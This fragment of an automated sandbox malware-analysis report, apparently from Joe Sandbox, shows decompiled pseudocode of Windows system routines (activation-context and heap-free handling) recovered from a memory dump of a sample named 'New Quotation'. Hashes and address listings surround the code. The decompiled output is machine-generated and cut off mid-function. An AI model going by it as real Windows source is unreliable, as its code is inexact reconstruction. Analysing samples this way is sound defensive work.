									_t98 = _t110 >> 0x00000010 ^  *( *( *[fs:0x18] + 0x1a8) + 0x14);
									_t60 =  *( *[fs:0x18] + 0x1a8);
									if((0x00000fff & (_t110 >> 0x00000010 ^  *( *( *[fs:0x18] + 0x1a8) + 0x14))) != 0) {
										_push( *(_t60 + 0x14) & 0x00000fff);
										_push(_t110);
										E1D85EF10(0x33, 0, "SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix\n", "RtlDeactivateActivationContext");
										_t129 = _t129 + 0x18;
										L35:
										_push(0xc000000d);
										goto L37;
									} else {
										_t115 =  *_t60;
										_v116 = _t60;
										if(_t115 != 0) {
											_t87 =  *(_t115 + 8) & 0x00000008;
											asm("sbb ecx, ecx");
											_t106 =  ~_t87 & _t115;
											if(_t87 == 0 ||  *((intOrPtr*)(_t106 + 0xc)) != _t110) {
												L38:
												_t120 =  *_t115;
												_t98 = 0;
												if(_t120 == 0) {
													_t63 = 0;
												} else {
													asm("sbb eax, eax");
													_t63 =  ~( *(_t120 + 8) & 8) & _t120;
												}
												if(_t120 == 0) {
													L36:
													_push(0xc0150010);
													L37:
													E1D828AA0(_t98, _t110);
													goto L38;
												}
												while(_t63 == 0 ||  *((intOrPtr*)(_t63 + 0xc)) != _t110) {
													_t120 =  *_t120;
													_t98 = _t98 + 1;
													if(_t120 == 0) {
														_t63 = 0;
													} else {
														asm("sbb eax, eax");
														_t63 =  ~( *(_t120 + 8) & 8) & _t120;
													}
													if(_t120 != 0) {
														continue;
													}
													break;
												}
												if(_t120 == 0) {
													goto L36;
												}
												_v104 = _v104 & 0x00000000;
												_v108 = _v108 & 0x00000000;
												_push( &_v112);
												_v96 = 3;
												_v92 = _t98;
												_v88 = _t120;
												_v84 = _t115;
												_v112 = 0xc015000f;
												E1D828A60(_t98, _t110);
											} else {
												_t120 = _t115;
											}
											_t121 =  *_t120;
											do {
												_t66 =  *(_t115 + 8);
												_t95 =  *_t115;
												if((_t66 & 0x00000001) != 0) {
													E1D7D26A0(_t66,  *(_t115 + 4));
													_t66 =  *(_t115 + 8);
												}
												if((_t66 & 0x00000008) != 0) {
													_t110 = _t115;
													E1D804B79(_v108, _t115);
												}
												_t115 = _t95;
											} while (_t95 != _t121);
											_t60 = _v108;
											 *_v108 = _t121;
										}
									}
								}
							}
						}
						_pop(_t116);
						_pop(_t122);
						_pop(_t96);
						return E1D814B50(_t60, _t96, _v20 ^ _t129, _t110, _t116, _t122);
					} else {
						_t107 =  *(_t115 + 4);
						if( *_t107 != _t115) {
							goto L16;
						} else {
							 *_t107 = _t58;
							_t115 = _t58;
							 *(_t58 + 4) = _t107;
							_t57 = E1D7E3BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t110);
							goto L3;
						}
					}
				}
			}








































                                                                                                                                                                                          0x1d8049f0
                                                                                                                                                                                          0x1d8049f5
                                                                                                                                                                                          0x1d8049f8
                                                                                                                                                                                          0x1d8049fb
                                                                                                                                                                                          0x1d804a01
                                                                                                                                                                                          0x1d804a1b
                                                                                                                                                                                          0x1d804a21
                                                                                                                                                                                          0x1d804a03
                                                                                                                                                                                          0x1d804a03
                                                                                                                                                                                          0x1d804a07
                                                                                                                                                                                          0x1d804a4f
                                                                                                                                                                                          0x1d804a4f
                                                                                                                                                                                          0x1d804a52
                                                                                                                                                                                          0x1d804a56
                                                                                                                                                                                          0x1d804a5b
                                                                                                                                                                                          0x1d804a60
                                                                                                                                                                                          0x1d804a60
                                                                                                                                                                                          0x1d804a65
                                                                                                                                                                                          0x1d804a6b
                                                                                                                                                                                          0x1d804a6b
                                                                                                                                                                                          0x1d804a70
                                                                                                                                                                                          0x1d804a74
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804a76
                                                                                                                                                                                          0x1d804a4f
                                                                                                                                                                                          0x1d804a09
                                                                                                                                                                                          0x1d804a09
                                                                                                                                                                                          0x1d804a0c
                                                                                                                                                                                          0x1d804a0f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804a11
                                                                                                                                                                                          0x1d804a13
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804a15
                                                                                                                                                                                          0x1d804a19
                                                                                                                                                                                          0x1d804a84
                                                                                                                                                                                          0x1d804a84
                                                                                                                                                                                          0x1d804a19
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804a24
                                                                                                                                                                                          0x1d804a24
                                                                                                                                                                                          0x1d804a26
                                                                                                                                                                                          0x1d804a26
                                                                                                                                                                                          0x1d804a2c
                                                                                                                                                                                          0x1d804a8b
                                                                                                                                                                                          0x1d804a8d
                                                                                                                                                                                          0x1d804a8e
                                                                                                                                                                                          0x1d804a90
                                                                                                                                                                                          0x1d804a91
                                                                                                                                                                                          0x1d804a92
                                                                                                                                                                                          0x1d804a93
                                                                                                                                                                                          0x1d804a94
                                                                                                                                                                                          0x1d804a95
                                                                                                                                                                                          0x1d804a96
                                                                                                                                                                                          0x1d804a97
                                                                                                                                                                                          0x1d804a98
                                                                                                                                                                                          0x1d804a99
                                                                                                                                                                                          0x1d804a9a
                                                                                                                                                                                          0x1d804a9b
                                                                                                                                                                                          0x1d804a9c
                                                                                                                                                                                          0x1d804a9d
                                                                                                                                                                                          0x1d804a9e
                                                                                                                                                                                          0x1d804a9f
                                                                                                                                                                                          0x1d804aa8
                                                                                                                                                                                          0x1d804ab0
                                                                                                                                                                                          0x1d804ab2
                                                                                                                                                                                          0x1d804abd
                                                                                                                                                                                          0x1d804abe
                                                                                                                                                                                          0x1d804abf
                                                                                                                                                                                          0x1d804ac0
                                                                                                                                                                                          0x1d84322c
                                                                                                                                                                                          0x1d84322f
                                                                                                                                                                                          0x1d843234
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804ac6
                                                                                                                                                                                          0x1d804ac6
                                                                                                                                                                                          0x1d804acb
                                                                                                                                                                                          0x1d804add
                                                                                                                                                                                          0x1d84323b
                                                                                                                                                                                          0x1d84323c
                                                                                                                                                                                          0x1d843241
                                                                                                                                                                                          0x1d843246
                                                                                                                                                                                          0x1d843246
                                                                                                                                                                                          0x1d843248
                                                                                                                                                                                          0x1d84324a
                                                                                                                                                                                          0x1d84324f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804ae3
                                                                                                                                                                                          0x1d804af9
                                                                                                                                                                                          0x1d804b02
                                                                                                                                                                                          0x1d804b0a
                                                                                                                                                                                          0x1d843259
                                                                                                                                                                                          0x1d84325a
                                                                                                                                                                                          0x1d843269
                                                                                                                                                                                          0x1d84326e
                                                                                                                                                                                          0x1d843271
                                                                                                                                                                                          0x1d843271
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804b10
                                                                                                                                                                                          0x1d804b10
                                                                                                                                                                                          0x1d804b12
                                                                                                                                                                                          0x1d804b18
                                                                                                                                                                                          0x1d804b1d
                                                                                                                                                                                          0x1d804b24
                                                                                                                                                                                          0x1d804b26
                                                                                                                                                                                          0x1d804b2a
                                                                                                                                                                                          0x1d843282
                                                                                                                                                                                          0x1d843282
                                                                                                                                                                                          0x1d843284
                                                                                                                                                                                          0x1d843288
                                                                                                                                                                                          0x1d84329a
                                                                                                                                                                                          0x1d84328a
                                                                                                                                                                                          0x1d843294
                                                                                                                                                                                          0x1d843296
                                                                                                                                                                                          0x1d843296
                                                                                                                                                                                          0x1d84329e
                                                                                                                                                                                          0x1d843278
                                                                                                                                                                                          0x1d843278
                                                                                                                                                                                          0x1d84327d
                                                                                                                                                                                          0x1d84327d
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d84327d
                                                                                                                                                                                          0x1d8432a0
                                                                                                                                                                                          0x1d8432a9
                                                                                                                                                                                          0x1d8432ab
                                                                                                                                                                                          0x1d8432ae
                                                                                                                                                                                          0x1d8432c0
                                                                                                                                                                                          0x1d8432b0
                                                                                                                                                                                          0x1d8432ba
                                                                                                                                                                                          0x1d8432bc
                                                                                                                                                                                          0x1d8432bc
                                                                                                                                                                                          0x1d8432c4
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8432c4
                                                                                                                                                                                          0x1d8432c8
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d8432ca
                                                                                                                                                                                          0x1d8432d3
                                                                                                                                                                                          0x1d8432d8
                                                                                                                                                                                          0x1d8432d9
                                                                                                                                                                                          0x1d8432e1
                                                                                                                                                                                          0x1d8432e5
                                                                                                                                                                                          0x1d8432e9
                                                                                                                                                                                          0x1d8432ed
                                                                                                                                                                                          0x1d8432f5
                                                                                                                                                                                          0x1d804b39
                                                                                                                                                                                          0x1d804b39
                                                                                                                                                                                          0x1d804b39
                                                                                                                                                                                          0x1d804b3b
                                                                                                                                                                                          0x1d804b3d
                                                                                                                                                                                          0x1d804b3d
                                                                                                                                                                                          0x1d804b40
                                                                                                                                                                                          0x1d804b44
                                                                                                                                                                                          0x1d843302
                                                                                                                                                                                          0x1d843307
                                                                                                                                                                                          0x1d843307
                                                                                                                                                                                          0x1d804b4c
                                                                                                                                                                                          0x1d804b52
                                                                                                                                                                                          0x1d804b54
                                                                                                                                                                                          0x1d804b54
                                                                                                                                                                                          0x1d804b59
                                                                                                                                                                                          0x1d804b5b
                                                                                                                                                                                          0x1d804b5f
                                                                                                                                                                                          0x1d804b63
                                                                                                                                                                                          0x1d804b63
                                                                                                                                                                                          0x1d804b18
                                                                                                                                                                                          0x1d804b0a
                                                                                                                                                                                          0x1d804add
                                                                                                                                                                                          0x1d804acb
                                                                                                                                                                                          0x1d804b69
                                                                                                                                                                                          0x1d804b6a
                                                                                                                                                                                          0x1d804b6b
                                                                                                                                                                                          0x1d804b76
                                                                                                                                                                                          0x1d804a2e
                                                                                                                                                                                          0x1d804a2e
                                                                                                                                                                                          0x1d804a33
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804a35
                                                                                                                                                                                          0x1d804a35
                                                                                                                                                                                          0x1d804a37
                                                                                                                                                                                          0x1d804a39
                                                                                                                                                                                          0x1d804a48
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x1d804a48
                                                                                                                                                                                          0x1d804a33
                                                                                                                                                                                          0x1d804a2c

                                                                                                                                                                                          Strings
                                                                                                                                                                                          • SXS: %s() called with invalid flags 0x%08lx, xrefs: 1D843234
                                                                                                                                                                                          • RtlDeactivateActivationContext, xrefs: 1D84322F, 1D84323C, 1D84325B
                                                                                                                                                                                          • SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 1D843260
                                                                                                                                                                                          • SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 1D843241
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
                                                                                                                                                                                          • API String ID: 0-1245972979
                                                                                                                                                                                          • Opcode ID: 0a0d6f309c9ff8541ea7a44e79662c1e50fccb1f2dce1b84b0443d759380f76c
                                                                                                                                                                                          • Instruction ID: e2f9d9e928ef0764fc261c8f91ff91e8674f0bf47ff5e93170201f50dc95ee28
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a0d6f309c9ff8541ea7a44e79662c1e50fccb1f2dce1b84b0443d759380f76c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2F61E3726947269FC712CF5CCC81B26B3A9EF84B61F228519F9599B290C730E801CB93
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D880D24 Relevance: 5.1, Strings: 4, Instructions: 113COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000007.00000002.49660847466.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000007.00000002.49662270374.000000001D8C9000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000007.00000002.49662305343.000000001D8CD000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_7_2_1d7a0000_New Quotation.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InitializeThunk
                                                                                                                                                                                          • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                                                                                                                                                                                          • API String ID: 2994545307-336120773
                                                                                                                                                                                          • Opcode ID: bfdafbf1d86298ad1f1e1a26d51de9001c83f76d15553f3c1951fc89a8efc5d7
                                                                                                                                                                                          • Instruction ID: 804dcf151aeca4b160deb86fe181b1be47209afb43021f03d5bdaf2ac75b3b00
                                                                                                                                                                                          • Opcode Fuzzy Hash: bfdafbf1d86298ad1f1e1a26d51de9001c83f76d15553f3c1951fc89a8efc5d7
                                                                                                                                                                                          • Instruction Fuzzy Hash: C9311276504629EFD301CB58D884FAB73A8EF04BB0F164656F501CB2A2E731B941EB63
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 1D7E1EB2 Relevance: 4.3, Strings: 3, Instructions: 563COMMONCrypto
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 63%
                                                                                                                                                                                          			E1D7E1EB2(signed char __ecx, signed short* __edx, signed int* _a4, char _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				unsigned int _v28;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t192;
				intOrPtr _t193;
				signed short _t196;
				signed int _t202;
				signed short _t203;
				intOrPtr _t209;
				signed int _t213;
				signed int _t216;
				signed short _t221;
				intOrPtr _t222;
				signed short _t225;
				signed int _t227;
				signed short _t228;
				intOrPtr _t234;
				signed int _t238;
				signed int _t241;
				signed int _t251;
				char _t259;
				signed short _t260;
				intOrPtr _t261;
				signed short _t263;
				intOrPtr _t264;
				signed int _t267;
				signed int _t268;
				signed short _t271;
				intOrPtr _t282;
				signed int _t288;
				signed int _t291;
				signed int _t293;
				signed int _t295;
				intOrPtr _t301;
				signed int _t305;
				signed int _t308;
				signed short* _t319;
				void* _t321;
				signed int* _t323;
				signed short* _t324;
				void* _t325;
				signed short* _t326;
				signed char _t327;
				intOrPtr _t329;
				signed int _t336;
				signed short* _t339;
				signed char _t340;
				intOrPtr _t344;
				signed int _t350;
				signed short* _t355;
				void* _t356;
				signed short* _t357;
				signed short _t358;
				signed char _t360;
				intOrPtr _t362;
				intOrPtr* _t368;
				signed char _t369;
				intOrPtr _t370;
				signed int _t377;
				signed int* _t380;
				signed int _t381;
				signed short _t383;
				signed int _t385;
				signed int _t389;
				signed int* _t390;
				unsigned int _t394;
				signed short _t396;
				signed short _t398;
				signed int _t400;
				signed int _t403;
				signed short* _t409;
				signed int* _t410;
				signed char _t416;
				void* _t418;
				void* _t419;

				_t322 = __ecx;
				_t419 = _t418 - 0x1c;
				_t319 = __edx;
				_t409 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				_t416 = __ecx;
				if(_t409 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t409[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L7:
					_t380 = _a4;
					goto L8;
				} else {
					if( *(__ecx + 0x4c) != 0) {
						 *_t409 =  *_t409 ^  *(__ecx + 0x50);
						if(_t409[1] != (_t409[0] ^  *_t409 ^ _t409[1])) {
							_push(__ecx);
							E1D88D646(__edx, __ecx, _t409, _t409, __ecx, __eflags);
						}
					}
					_t259 = _a8;
					_v5 = _t259;
					if(_t259 != 0) {
						_t396 = _t319[6];
						_t355 =  &(_t319[4]);
						_t260 =  *_t355;
						_v12 = _t260;
						_v16 = _t396;
						_t261 =  *((intOrPtr*)(_t260 + 4));
						__eflags =  *_t396 - _t261;
						if( *_t396 != _t261) {
							L59:
							_push(0);
							_push( *_t396);
							_push(_t261);
							_push(_t355);
							_t356 = 0xd;
							E1D895FED(_t356, _t416);
							L60:
							_v5 = 0;
							goto L5;
						}
						__eflags =  *_t396 - _t355;
						if( *_t396 != _t355) {
							goto L59;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
						_t403 =  *(_t416 + 0xb4);
						__eflags = _t403;
						if(_t403 == 0) {
							L46:
							_t368 = _v16;
							_t291 = _v12;
							 *_t368 = _t291;
							 *((intOrPtr*)(_t291 + 4)) = _t368;
							__eflags = _t319[1] & 0x00000008;
							if((_t319[1] & 0x00000008) == 0) {
								L49:
								_t369 = _t319[1];
								__eflags = _t369 & 0x00000004;
								if((_t369 & 0x00000004) != 0) {
									_t293 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t293;
									__eflags = _t369 & 0x00000002;
									if((_t369 & 0x00000002) != 0) {
										__eflags = _t293 - 4;
										if(_t293 > 4) {
											_t293 = _t293 - 4;
											__eflags = _t293;
											_v12 = _t293;
										}
									}
									_t295 = E1D8280A0( &(_t319[8]), _t293, 0xfeeefeee);
									_v16 = _t295;
									__eflags = _t295 - _v12;
									if(_t295 != _v12) {
										_t370 =  *[fs:0x30];
										__eflags =  *(_t370 + 0xc);
										if( *(_t370 + 0xc) == 0) {
											_push("HEAP: ");
											E1D7CB910();
										} else {
											E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t319);
										E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
										_t301 =  *[fs:0x30];
										_t419 = _t419 + 0xc;
										__eflags =  *((char*)(_t301 + 2));
										if( *((char*)(_t301 + 2)) != 0) {
											 *0x1d8c47a1 = 1;
											asm("int3");
											 *0x1d8c47a1 = 0;
										}
									}
								}
								goto L60;
							}
							_t305 = E1D7CF5C7(_t416, _t319);
							__eflags = _t305;
							if(_t305 != 0) {
								goto L49;
							}
							E1D7CF113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
							goto L60;
						}
						_t377 =  *_t319 & 0x0000ffff;
						while(1) {
							__eflags = _t377 -  *((intOrPtr*)(_t403 + 4));
							if(_t377 <  *((intOrPtr*)(_t403 + 4))) {
								break;
							}
							_t308 =  *_t403;
							__eflags = _t308;
							if(_t308 == 0) {
								_t310 =  *((intOrPtr*)(_t403 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t403 + 4)) - 1;
								L45:
								E1D7E036A(_t416, _t403, 1,  &(_t319[4]), _t310, _t377);
								goto L46;
							}
							_t403 = _t308;
						}
						_t310 = _t377;
						goto L45;
					}
					L5:
					_t398 = _t409[6];
					_t357 =  &(_t409[4]);
					_t263 =  *_t357;
					_v12 = _t263;
					_v20 = _t398;
					_t264 =  *((intOrPtr*)(_t263 + 4));
					if( *_t398 == _t264) {
						__eflags =  *_t398 - _t357;
						if( *_t398 != _t357) {
							goto L6;
						}
						 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t409 & 0x0000ffff);
						_t400 =  *(_t416 + 0xb4);
						__eflags = _t400;
						if(_t400 == 0) {
							L21:
							_t358 = _v20;
							_t267 = _v12;
							 *_t358 = _t267;
							 *(_t267 + 4) = _t358;
							__eflags = _t409[1] & 0x00000008;
							if((_t409[1] & 0x00000008) != 0) {
								_t268 = E1D7CF5C7(_t416, _t409);
								__eflags = _t268;
								if(_t268 != 0) {
									goto L22;
								}
								_t322 = _t416;
								E1D7CF113(_t322, _t409,  *_t409 & 0x0000ffff, 1);
								goto L7;
							}
							L22:
							_t360 = _t409[1];
							__eflags = _t360 & 0x00000004;
							if((_t360 & 0x00000004) != 0) {
								_t321 = ( *_t409 & 0x0000ffff) * 8 - 0x10;
								__eflags = _t360 & 0x00000002;
								if((_t360 & 0x00000002) != 0) {
									__eflags = _t321 - 4;
									if(_t321 > 4) {
										_t321 = _t321 - 4;
									}
								}
								_t271 = E1D8280A0( &(_t409[8]), _t321, 0xfeeefeee);
								_v20 = _t271;
								__eflags = _t271 - _t321;
								if(_t271 != _t321) {
									_t362 =  *[fs:0x30];
									__eflags =  *(_t362 + 0xc);
									if( *(_t362 + 0xc) != 0) {
										__eflags =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c;
										E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
									} else {
										_push("HEAP: ");
										E1D7CB910();
									}
									_push(_v20 + 0x10 + _t409);
									E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t409);
									_t282 =  *[fs:0x30];
									_t419 = _t419 + 0xc;
									__eflags =  *((char*)(_t282 + 2));
									if( *((char*)(_t282 + 2)) != 0) {
										 *0x1d8c47a1 = 1;
										asm("int3");
										 *0x1d8c47a1 = 0;
									}
								}
							}
							_t380 = _a4;
							_t319 = _t409;
							_t409[1] = 0;
							_t409[3] = 0;
							 *_t380 =  *_t380 + ( *_t409 & 0x0000ffff);
							 *_t409 =  *_t380;
							_t322 =  *_t380 ^  *(_t416 + 0x54);
							 *(_t409 + 4 +  *_t380 * 8) = _t322;
							L8:
							_t410 = _t319 +  *_t380 * 8;
							if( *(_t416 + 0x4c) == 0) {
								L10:
								while((( *(_t416 + 0x4c) >> 0x00000014 &  *(_t416 + 0x52) ^ _t410[0]) & 0x00000001) == 0) {
									__eflags =  *(_t416 + 0x4c);
									if( *(_t416 + 0x4c) != 0) {
										 *_t410 =  *_t410 ^  *(_t416 + 0x50);
										__eflags = _t410[0] - (_t410[0] ^  *_t410 ^ _t410[0]);
										if(__eflags != 0) {
											_push(_t322);
											E1D88D646(_t319, _t416, _t410, _t410, _t416, __eflags);
										}
									}
									__eflags = _v5;
									if(_v5 == 0) {
										L94:
										_t381 = _t410[3];
										_t323 =  &(_t410[2]);
										_t192 =  *_t323;
										_v20 = _t192;
										_v16 = _t381;
										_t193 =  *((intOrPtr*)(_t192 + 4));
										__eflags =  *_t381 - _t193;
										if( *_t381 != _t193) {
											L63:
											_push(0);
											_push( *_t381);
											_push(_t193);
											_push(_t323);
											_push(0xd);
											L64:
											_pop(_t322);
											E1D895FED(_t322, _t416);
											continue;
										}
										__eflags =  *_t381 - _t323;
										if( *_t381 != _t323) {
											goto L63;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t410 & 0x0000ffff);
										_t389 =  *(_t416 + 0xb4);
										__eflags = _t389;
										if(_t389 == 0) {
											L104:
											_t339 = _v16;
											_t196 = _v20;
											 *_t339 = _t196;
											 *(_t196 + 4) = _t339;
											__eflags = _t410[0] & 0x00000008;
											if((_t410[0] & 0x00000008) == 0) {
												L107:
												_t340 = _t410[0];
												__eflags = _t340 & 0x00000004;
												if((_t340 & 0x00000004) != 0) {
													_t202 = ( *_t410 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t202;
													__eflags = _t340 & 0x00000002;
													if((_t340 & 0x00000002) != 0) {
														__eflags = _t202 - 4;
														if(_t202 > 4) {
															_t202 = _t202 - 4;
															__eflags = _t202;
															_v12 = _t202;
														}
													}
													_t203 = E1D8280A0( &(_t410[4]), _t202, 0xfeeefeee);
													_v20 = _t203;
													__eflags = _t203 - _v12;
													if(_t203 != _v12) {
														_t344 =  *[fs:0x30];
														__eflags =  *(_t344 + 0xc);
														if( *(_t344 + 0xc) == 0) {
															_push("HEAP: ");
															E1D7CB910();
														} else {
															E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t410);
														E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t410);
														_t209 =  *[fs:0x30];
														__eflags =  *((char*)(_t209 + 2));
														if( *((char*)(_t209 + 2)) != 0) {
															 *0x1d8c47a1 = 1;
															asm("int3");
															 *0x1d8c47a1 = 0;
														}
													}
												}
												_t390 = _a4;
												_t319[1] = 0;
												_t319[3] = 0;
												 *_t390 =  *_t390 + ( *_t410 & 0x0000ffff);
												 *_t319 =  *_t390;
												 *(_t319 + 4 +  *_t390 * 8) =  *_t390 ^  *(_t416 + 0x54);
												break;
											}
											_t213 = E1D7CF5C7(_t416, _t410);
											__eflags = _t213;
											if(_t213 != 0) {
												goto L107;
											}
											_t322 = _t416;
											E1D7CF113(_t322, _t410,  *_t410 & 0x0000ffff, 1);
											continue;
										}
										_t350 =  *_t410 & 0x0000ffff;
										while(1) {
											__eflags = _t350 -  *((intOrPtr*)(_t389 + 4));
											if(_t350 <  *((intOrPtr*)(_t389 + 4))) {
												break;
											}
											_t216 =  *_t389;
											__eflags = _t216;
											if(_t216 == 0) {
												_t218 =  *((intOrPtr*)(_t389 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t389 + 4)) - 1;
												L103:
												E1D7E036A(_t416, _t389, 1,  &(_t410[2]), _t218, _t350);
												goto L104;
											}
											_t389 = _t216;
										}
										_t218 = _t350;
										goto L103;
									} else {
										_t383 = _t319[6];
										_t324 =  &(_t319[4]);
										_t221 =  *_t324;
										_v20 = _t221;
										_v16 = _t383;
										_t222 =  *((intOrPtr*)(_t221 + 4));
										__eflags =  *_t383 - _t222;
										if( *_t383 != _t222) {
											L92:
											_push(0);
											_push( *_t383);
											_push(_t222);
											_push(_t324);
											_t325 = 0xd;
											E1D895FED(_t325, _t416);
											L93:
											_v5 = 0;
											goto L94;
										}
										__eflags =  *_t383 - _t324;
										if( *_t383 != _t324) {
											goto L92;
										}
										 *((intOrPtr*)(_t416 + 0x74)) =  *((intOrPtr*)(_t416 + 0x74)) - ( *_t319 & 0x0000ffff);
										_t385 =  *(_t416 + 0xb4);
										__eflags = _t385;
										if(_t385 == 0) {
											L79:
											_t326 = _v16;
											_t225 = _v20;
											 *_t326 = _t225;
											 *(_t225 + 4) = _t326;
											__eflags = _t319[1] & 0x00000008;
											if((_t319[1] & 0x00000008) == 0) {
												L82:
												_t327 = _t319[1];
												__eflags = _t327 & 0x00000004;
												if((_t327 & 0x00000004) != 0) {
													_t227 = ( *_t319 & 0x0000ffff) * 8 - 0x10;
													_v12 = _t227;
													__eflags = _t327 & 0x00000002;
													if((_t327 & 0x00000002) != 0) {
														__eflags = _t227 - 4;
														if(_t227 > 4) {
															_t227 = _t227 - 4;
															__eflags = _t227;
															_v12 = _t227;
														}
													}
													_t228 = E1D8280A0( &(_t319[8]), _t227, 0xfeeefeee);
													_v20 = _t228;
													__eflags = _t228 - _v12;
													if(_t228 != _v12) {
														_t329 =  *[fs:0x30];
														__eflags =  *(_t329 + 0xc);
														if( *(_t329 + 0xc) == 0) {
															_push("HEAP: ");
															E1D7CB910();
														} else {
															E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
														}
														_push(_v20 + 0x10 + _t319);
														E1D7CB910("HEAP: Free Heap block %p modified at %p after it was freed\n", _t319);
														_t234 =  *[fs:0x30];
														_t419 = _t419 + 0xc;
														__eflags =  *((char*)(_t234 + 2));
														if( *((char*)(_t234 + 2)) != 0) {
															 *0x1d8c47a1 = 1;
															asm("int3");
															 *0x1d8c47a1 = 0;
														}
													}
												}
												goto L93;
											}
											_t238 = E1D7CF5C7(_t416, _t319);
											__eflags = _t238;
											if(_t238 != 0) {
												goto L82;
											}
											E1D7CF113(_t416, _t319,  *_t319 & 0x0000ffff, 1);
											goto L93;
										}
										_t336 =  *_t319 & 0x0000ffff;
										while(1) {
											__eflags = _t336 -  *((intOrPtr*)(_t385 + 4));
											if(_t336 <  *((intOrPtr*)(_t385 + 4))) {
												break;
											}
											_t241 =  *_t385;
											__eflags = _t241;
											if(_t241 == 0) {
												_t243 =  *((intOrPtr*)(_t385 + 4)) - 1;
												__eflags =  *((intOrPtr*)(_t385 + 4)) - 1;
												L78:
												E1D7E036A(_t416, _t385, 1,  &(_t319[4]), _t243, _t336);
												goto L79;
											}
											_t385 = _t241;
										}
										_t243 = _t336;
										goto L78;
									}
								}
								return _t319;
							}
							_t251 =  *_t410;
							_t394 =  *(_t416 + 0x50) ^ _t251;
							_v28 = _t251;
							_v28 = _t394;
							_t322 = _t394 >> 0x00000010 ^ _t394 >> 0x00000008 ^ _t394;
							if(_t394 >> 0x18 != _t322) {
								_push(0);
								_push(0);
								_push(0);
								_push(_t410);
								_push(3);
								goto L64;
							}
							goto L10;
						} else {
